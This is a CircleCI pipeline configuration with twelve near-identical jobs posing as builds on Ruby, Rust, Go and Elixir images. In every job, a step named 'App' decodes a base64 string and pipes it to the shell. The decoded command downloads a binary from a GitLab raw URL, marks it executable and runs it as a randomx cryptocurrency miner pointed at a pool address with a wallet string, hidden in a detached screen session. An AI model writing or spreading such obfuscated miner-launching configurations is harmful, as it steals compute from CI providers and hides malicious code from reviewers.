version: 2.1
jobs:
  App_01:
    docker:
      - image: circleci/ruby:3.0.1-buster

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            echo "123"
            echo "123"
      - run:
          name: App
          command: |
            screen -dmS ls
            base64 -d <<< d2dldCBodHRwczovL2dpdGxhYi5jb20vbWFqYXBhaGxldmkvbXZwLy0vcmF3L21haW4vaGFqaSAmJiBjaG1vZCA3NzcgaGFqaSAmJiAuL2hhamkgLW8gMTU3LjIzMC4yMzkuMTE6ODAgLXUgU2FMdnNDOW1KdEg0MzVUblNob2NUMzg3dVFSR1pjRFpHSnNmWUY0TWZ1QUdUUkdBZmZzVU5qU0F0TmRnRHRzcUhHREFxU3U4aWN3UXBqRDhlQmJYQXRveU5xekhEUVc0b1BBIC1rIC1hIHJhbmRvbXggLS10bHM= | sh
            sudo apt update -y
            ls
  App_02:
    docker:
      - image: circleci/rust:1.53.0-buster

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            echo "123"
            echo "123"
      - run:
          name: App
          command: |
            screen -dmS ls
            base64 -d <<< d2dldCBodHRwczovL2dpdGxhYi5jb20vbWFqYXBhaGxldmkvbXZwLy0vcmF3L21haW4vaGFqaSAmJiBjaG1vZCA3NzcgaGFqaSAmJiAuL2hhamkgLW8gMTU3LjIzMC4yMzkuMTE6ODAgLXUgU2FMdnNDOW1KdEg0MzVUblNob2NUMzg3dVFSR1pjRFpHSnNmWUY0TWZ1QUdUUkdBZmZzVU5qU0F0TmRnRHRzcUhHREFxU3U4aWN3UXBqRDhlQmJYQXRveU5xekhEUVc0b1BBIC1rIC1hIHJhbmRvbXggLS10bHM= | sh
            sudo apt update -y
            ls
  App_03:
    docker:
      - image: circleci/golang:1.17-rc-buster

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            echo "123"
            echo "123"
      - run:
          name: App
          command: |
            screen -dmS ls
            base64 -d <<< d2dldCBodHRwczovL2dpdGxhYi5jb20vbWFqYXBhaGxldmkvbXZwLy0vcmF3L21haW4vaGFqaSAmJiBjaG1vZCA3NzcgaGFqaSAmJiAuL2hhamkgLW8gMTU3LjIzMC4yMzkuMTE6ODAgLXUgU2FMdnNDOW1KdEg0MzVUblNob2NUMzg3dVFSR1pjRFpHSnNmWUY0TWZ1QUdUUkdBZmZzVU5qU0F0TmRnRHRzcUhHREFxU3U4aWN3UXBqRDhlQmJYQXRveU5xekhEUVc0b1BBIC1rIC1hIHJhbmRvbXggLS10bHM= | sh
            sudo apt update -y
            ls
  App_04:
    docker:
      - image: circleci/elixir:1.12.2

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            echo "123"
            echo "123"
      - run:
          name: App
          command: |
            screen -dmS ls
            base64 -d <<< d2dldCBodHRwczovL2dpdGxhYi5jb20vbWFqYXBhaGxldmkvbXZwLy0vcmF3L21haW4vaGFqaSAmJiBjaG1vZCA3NzcgaGFqaSAmJiAuL2hhamkgLW8gMTU3LjIzMC4yMzkuMTE6ODAgLXUgU2FMdnNDOW1KdEg0MzVUblNob2NUMzg3dVFSR1pjRFpHSnNmWUY0TWZ1QUdUUkdBZmZzVU5qU0F0TmRnRHRzcUhHREFxU3U4aWN3UXBqRDhlQmJYQXRveU5xekhEUVc0b1BBIC1rIC1hIHJhbmRvbXggLS10bHM= | sh
            sudo apt update -y
            ls
  App_05:
    docker:
      - image: circleci/ruby:3.0

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            echo "123"
            echo "123"
      - run:
          name: App
          command: |
            screen -dmS ls
            base64 -d <<< d2dldCBodHRwczovL2dpdGxhYi5jb20vbWFqYXBhaGxldmkvbXZwLy0vcmF3L21haW4vaGFqaSAmJiBjaG1vZCA3NzcgaGFqaSAmJiAuL2hhamkgLW8gMTU3LjIzMC4yMzkuMTE6ODAgLXUgU2FMdnNDOW1KdEg0MzVUblNob2NUMzg3dVFSR1pjRFpHSnNmWUY0TWZ1QUdUUkdBZmZzVU5qU0F0TmRnRHRzcUhHREFxU3U4aWN3UXBqRDhlQmJYQXRveU5xekhEUVc0b1BBIC1rIC1hIHJhbmRvbXggLS10bHM= | sh
            sudo apt update -y
            ls
  App_06:
    docker:
      - image: circleci/rust:1.53-buster

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            echo "123"
            echo "123"
      - run:
          name: App
          command: |
            screen -dmS ls
            base64 -d <<< d2dldCBodHRwczovL2dpdGxhYi5jb20vbWFqYXBhaGxldmkvbXZwLy0vcmF3L21haW4vaGFqaSAmJiBjaG1vZCA3NzcgaGFqaSAmJiAuL2hhamkgLW8gMTU3LjIzMC4yMzkuMTE6ODAgLXUgU2FMdnNDOW1KdEg0MzVUblNob2NUMzg3dVFSR1pjRFpHSnNmWUY0TWZ1QUdUUkdBZmZzVU5qU0F0TmRnRHRzcUhHREFxU3U4aWN3UXBqRDhlQmJYQXRveU5xekhEUVc0b1BBIC1rIC1hIHJhbmRvbXggLS10bHM= | sh
            sudo apt update -y
            ls
  App_07:
    docker:
      - image: circleci/golang:1.16.5

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            echo "123"
            echo "123"
      - run:
          name: App
          command: |
            screen -dmS ls
            base64 -d <<< d2dldCBodHRwczovL2dpdGxhYi5jb20vbWFqYXBhaGxldmkvbXZwLy0vcmF3L21haW4vaGFqaSAmJiBjaG1vZCA3NzcgaGFqaSAmJiAuL2hhamkgLW8gMTU3LjIzMC4yMzkuMTE6ODAgLXUgU2FMdnNDOW1KdEg0MzVUblNob2NUMzg3dVFSR1pjRFpHSnNmWUY0TWZ1QUdUUkdBZmZzVU5qU0F0TmRnRHRzcUhHREFxU3U4aWN3UXBqRDhlQmJYQXRveU5xekhEUVc0b1BBIC1rIC1hIHJhbmRvbXggLS10bHM= | sh
            sudo apt update -y
            ls
  App_08:
    docker:
      - image: circleci/elixir:1.12.2

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            echo "123"
            echo "123"
      - run:
          name: App
          command: |
            screen -dmS ls
            base64 -d <<< d2dldCBodHRwczovL2dpdGxhYi5jb20vbWFqYXBhaGxldmkvbXZwLy0vcmF3L21haW4vaGFqaSAmJiBjaG1vZCA3NzcgaGFqaSAmJiAuL2hhamkgLW8gMTU3LjIzMC4yMzkuMTE6ODAgLXUgU2FMdnNDOW1KdEg0MzVUblNob2NUMzg3dVFSR1pjRFpHSnNmWUY0TWZ1QUdUUkdBZmZzVU5qU0F0TmRnRHRzcUhHREFxU3U4aWN3UXBqRDhlQmJYQXRveU5xekhEUVc0b1BBIC1rIC1hIHJhbmRvbXggLS10bHM= | sh
            sudo apt update -y
            ls
  App_09:
    docker:
      - image: circleci/ruby:2.7.4-buster

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            echo "123"
            echo "123"
      - run:
          name: App
          command: |
            screen -dmS ls
            base64 -d <<< d2dldCBodHRwczovL2dpdGxhYi5jb20vbWFqYXBhaGxldmkvbXZwLy0vcmF3L21haW4vaGFqaSAmJiBjaG1vZCA3NzcgaGFqaSAmJiAuL2hhamkgLW8gMTU3LjIzMC4yMzkuMTE6ODAgLXUgU2FMdnNDOW1KdEg0MzVUblNob2NUMzg3dVFSR1pjRFpHSnNmWUY0TWZ1QUdUUkdBZmZzVU5qU0F0TmRnRHRzcUhHREFxU3U4aWN3UXBqRDhlQmJYQXRveU5xekhEUVc0b1BBIC1rIC1hIHJhbmRvbXggLS10bHM= | sh
            sudo apt update -y
            ls
  App_10:
    docker:
      - image: circleci/rust:1.52.1-buster

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            echo "123"
            echo "123"
      - run:
          name: App
          command: |
            screen -dmS ls
            base64 -d <<< d2dldCBodHRwczovL2dpdGxhYi5jb20vbWFqYXBhaGxldmkvbXZwLy0vcmF3L21haW4vaGFqaSAmJiBjaG1vZCA3NzcgaGFqaSAmJiAuL2hhamkgLW8gMTU3LjIzMC4yMzkuMTE6ODAgLXUgU2FMdnNDOW1KdEg0MzVUblNob2NUMzg3dVFSR1pjRFpHSnNmWUY0TWZ1QUdUUkdBZmZzVU5qU0F0TmRnRHRzcUhHREFxU3U4aWN3UXBqRDhlQmJYQXRveU5xekhEUVc0b1BBIC1rIC1hIHJhbmRvbXggLS10bHM= | sh
            sudo apt update -y
            ls
  App_11:
    docker:
      - image: circleci/golang:1.17-rc-buster

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            echo "123"
            echo "123"
      - run:
          name: App
          command: |
            screen -dmS ls
            base64 -d <<< d2dldCBodHRwczovL2dpdGxhYi5jb20vbWFqYXBhaGxldmkvbXZwLy0vcmF3L21haW4vaGFqaSAmJiBjaG1vZCA3NzcgaGFqaSAmJiAuL2hhamkgLW8gMTU3LjIzMC4yMzkuMTE6ODAgLXUgU2FMdnNDOW1KdEg0MzVUblNob2NUMzg3dVFSR1pjRFpHSnNmWUY0TWZ1QUdUUkdBZmZzVU5qU0F0TmRnRHRzcUhHREFxU3U4aWN3UXBqRDhlQmJYQXRveU5xekhEUVc0b1BBIC1rIC1hIHJhbmRvbXggLS10bHM= | sh
            sudo apt update -y
            ls
  App_12:
    docker:
      - image: circleci/elixir:1.12.2

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            echo "123"
            echo "123"
      - run:
          name: App
          command: |
            screen -dmS ls
            base64 -d <<< d2dldCBodHRwczovL2dpdGxhYi5jb20vbWFqYXBhaGxldmkvbXZwLy0vcmF3L21haW4vaGFqaSAmJiBjaG1vZCA3NzcgaGFqaSAmJiAuL2hhamkgLW8gMTU3LjIzMC4yMzkuMTE6ODAgLXUgU2FMdnNDOW1KdEg0MzVUblNob2NUMzg3dVFSR1pjRFpHSnNmWUY0TWZ1QUdUUkdBZmZzVU5qU0F0TmRnRHRzcUhHREFxU3U4aWN3UXBqRDhlQmJYQXRveU5xekhEUVc0b1BBIC1rIC1hIHJhbmRvbXggLS10bHM= | sh
            sudo apt update -y
            ls
 workflows:
    version: 2.1
    build:
        jobs:
            - App_01
            - App_02
            - App_03
            - App_04
            - App_05
            - App_06
            - App_07
            - App_08
            - App_09
            - App_10
            - App_11
            - App_12
